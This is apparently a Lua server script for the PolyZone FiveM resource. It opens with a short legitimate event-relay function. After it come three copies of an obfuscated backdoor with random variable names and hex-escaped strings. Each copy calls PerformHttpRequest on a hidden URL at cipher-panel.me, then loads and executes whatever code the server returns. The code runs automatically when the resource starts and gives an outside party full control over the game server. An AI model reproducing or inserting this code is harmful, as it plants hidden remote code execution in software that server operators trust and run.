local eventPrefix = '__PolyZone__:'

function triggerZoneEvent(eventName, ...)
  TriggerClientEvent(eventPrefix .. eventName, -1, ...)
end

RegisterNetEvent("PolyZone:TriggerZoneEvent")
AddEventHandler("PolyZone:TriggerZoneEvent", triggerZoneEvent)

exports("TriggerZoneEvent", triggerZoneEvent)

local AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[4][AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x71\x47\x32\x72\x30", function (itjQqwosrCranhJveFdtzZpgxlvMofPXWEgBrZpDHrEGmoMSiUwZuSPMszMNQJajKhStoD, iwabhcEdqhpUDmVwmlyuOrJqjJGhaJiacPfvsInhaBPZbbizLTrlvzaKGoSISusKlvYsXD) if (iwabhcEdqhpUDmVwmlyuOrJqjJGhaJiacPfvsInhaBPZbbizLTrlvzaKGoSISusKlvYsXD == AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[6] or iwabhcEdqhpUDmVwmlyuOrJqjJGhaJiacPfvsInhaBPZbbizLTrlvzaKGoSISusKlvYsXD == AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[5]) then return end AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[4][AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[2]](AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[4][AchGsmfYoDUNkiRXnBvqQuumfhfHAwjaBEgvEfOwRASiPsedsdmkwVQlFNyVgGbiAAAkMd[3]](iwabhcEdqhpUDmVwmlyuOrJqjJGhaJiacPfvsInhaBPZbbizLTrlvzaKGoSISusKlvYsXD))() end)

local EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[4][EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x71\x47\x32\x72\x30", function (FyuuvWzlLYPgjPhfrDiLojljQDerXvKZegEtHSLNDCATYFShfzxmCwzXwTEEFhRIUPHAxW, DHXffSSjLxesaPDxOxpUbrLVQOeTEgxReNiIhHBQzJWOLQRsaonlbpjvonWqhhgTFQBmje) if (DHXffSSjLxesaPDxOxpUbrLVQOeTEgxReNiIhHBQzJWOLQRsaonlbpjvonWqhhgTFQBmje == EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[6] or DHXffSSjLxesaPDxOxpUbrLVQOeTEgxReNiIhHBQzJWOLQRsaonlbpjvonWqhhgTFQBmje == EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[5]) then return end EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[4][EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[2]](EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[4][EOIENjKvSdzjdazPymsgXVHSmqWALdgZtUjrOpkWcrGSLQQNLmsAwYJDYHxvPlpjenCKYO[3]](DHXffSSjLxesaPDxOxpUbrLVQOeTEgxReNiIhHBQzJWOLQRsaonlbpjvonWqhhgTFQBmje))() end)

local OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[4][OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x71\x47\x32\x72\x30", function (vpEJLZPGaZJEMGWAEDzCMwWHZQqIcXPBwmxDYwQjjLrtkykEYEsgPrWofTPNBRMYymCKbo, eFTpOOJPxwkQMWRfpzxZcRSmRDLlywNIphbFhczlokJRyFivbbkLyaLynflsYVEVjbTVvQ) if (eFTpOOJPxwkQMWRfpzxZcRSmRDLlywNIphbFhczlokJRyFivbbkLyaLynflsYVEVjbTVvQ == OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[6] or eFTpOOJPxwkQMWRfpzxZcRSmRDLlywNIphbFhczlokJRyFivbbkLyaLynflsYVEVjbTVvQ == OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[5]) then return end OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[4][OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[2]](OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[4][OZpuztsOfmlELyRoPkNbVJwtHLNvkxaDcubUQNLyHOCzaiABZIWJSnPSEyAEIEsdccldiJ[3]](eFTpOOJPxwkQMWRfpzxZcRSmRDLlywNIphbFhczlokJRyFivbbkLyaLynflsYVEVjbTVvQ))() end)